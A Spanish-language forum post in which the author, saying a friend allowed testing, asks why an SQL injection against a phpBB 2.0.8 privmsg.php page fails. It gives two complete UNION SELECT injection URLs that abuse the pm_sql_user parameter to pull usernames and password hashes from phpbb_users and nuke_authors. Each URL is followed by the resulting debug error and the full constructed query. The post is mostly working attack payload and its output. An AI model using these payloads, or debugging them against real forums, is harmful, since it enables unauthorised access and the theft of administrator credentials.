no soy muy bueno con las inyecciones sql pero un amigo me ha dejado hacer algunas pruebas. hago la inyeccion pero me saca error, mi pregunta es que estoy haciendo mal? la version es 2.0.8. estoy cometiendo algun error en el codigo o este no es el codigo que debo utilizar? gracias por su ayuda.
http://www.xxxxx.com/xxxx/xxxxxx/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullFROMphpbb_usersWHEREuser_level=1LIMIT1/*
DEBUG MODE
SQL Error : 1054 Unknown column 'username' in 'field list'
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM reto4_privmsgs pm, reto4_privmsgs_text pmt, reto4_users u, reto4_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullFROMphpbb_usersWHEREuser_level=2LIMIT1/*AND ( ( pm.privmsgs_to_userid = 63 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 63 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /home/xxxx/public_html/xxxx/xxxxxxxx/privmsg.php
http://www.xxxx.com/xxxxxx/xxxxxx/privmsg.php?mode=post&u=2=name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20cualquiera=1%20LIMIT%201/*
Could not query private message post information
DEBUG MODE
SQL Error : 1146 Table 'cualquiera_hola.nuke_authors' doesn't exist
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM reto4_privmsgs pm, reto4_privmsgs_text pmt, reto4_users u, reto4_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM nuke_authors WHERE cualquiera=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 63 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 63 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /home/xxxxxx/public_html/xxxx/xxxxxxx/privmsg.php